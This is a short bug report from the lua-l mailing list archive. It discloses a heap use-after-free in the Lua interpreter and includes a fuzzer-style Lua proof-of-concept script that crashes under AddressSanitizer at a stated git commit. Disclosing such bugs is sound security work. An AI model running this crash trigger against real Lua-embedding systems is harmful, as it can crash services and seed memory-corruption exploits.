 |
lua-l archive |
|
|
||
|
Hi, We found a heap use after free bug in lua. POC: function errfunc()(function() print(xpcall( wrap, coroutine.wrap(function(a, b) function errfunc() a = {} end function test(do_yield) pcall(function() if do_yield then coroutine.yield() end end) 'fail' end coro = function() print(xpcall(test, errfunc)) xpcall(test, errfunc, true) end coro() end))) end) "" 'fail' end(function() print(xpcall(test, errfunc)) end)() When built with address sanitizer, run `lua poc.lua` and we get a crash. Tested on Ubuntu, lua git hash e1d8770f12542d34a3e32b825c95b93f8a341ee1 Best, Sent from Mail for Windows 10 |